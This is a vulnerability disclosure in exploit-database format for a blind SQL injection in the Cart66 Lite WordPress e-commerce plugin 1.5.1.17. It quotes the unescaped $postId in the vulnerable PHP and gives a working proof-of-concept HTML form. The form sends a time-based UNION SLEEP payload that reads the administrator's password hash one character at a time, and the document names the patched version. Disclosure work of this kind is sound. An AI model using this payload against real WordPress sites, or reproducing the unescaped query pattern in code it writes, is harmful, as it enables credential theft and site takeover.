44 lines
No EOL
1.6 KiB
Text
44 lines
No EOL
1.6 KiB
Text
# Exploit Title: Cart66 Lite WordPress Ecommerce 1.5.1.17 Blind SQL Injection
|
||
# Date: 29-10-2014
|
||
# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
|
||
# Software Link: https://downloads.wordpress.org/plugin/cart66-lite.1.5.1.17.zip
|
||
# Category: webapps
|
||
|
||
1. Description
|
||
|
||
Cart66Ajax::shortcodeProductsTable() is accessible for every registered user.
|
||
|
||
$postId is not escaped correctly (only html tags are stripped).
|
||
|
||
File: cart66-lite\models\Cart66Ajax.php
|
||
public static function shortcodeProductsTable() {
|
||
global $wpdb;
|
||
$prices = array();
|
||
$types = array();
|
||
$postId = Cart66Common::postVal('id');
|
||
$product = new Cart66Product();
|
||
$products = $product->getModels("where id=$postId", "order by name");
|
||
$data = array();
|
||
}
|
||
|
||
http://security.szurek.pl/cart66-lite-wordpress-ecommerce-15117-blind-sql-injection.html
|
||
|
||
2. Proof of Concept
|
||
|
||
Login as regular user (created using wp-login.php?action=register):
|
||
|
||
<form action="http://wordpress-install/wp-admin/admin-ajax.php" method="post">
|
||
<input type="hidden" name="action" value="shortcode_products_table">
|
||
Blind SQL Injection: <input type="text" name="id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM wp_users WHERE ID = 1) -- ">
|
||
<input value="Hack" type="submit">
|
||
</form>
|
||
|
||
This SQL will check if first password character user ID=1 is $.
|
||
|
||
If yes, it will sleep 5 seconds.
|
||
|
||
3. Solution:
|
||
|
||
Update to version 1.5.2
|
||
https://wordpress.org/plugins/cart66-lite/changelog/
|
||
https://downloads.wordpress.org/plugin/cart66-lite.1.5.2.zip |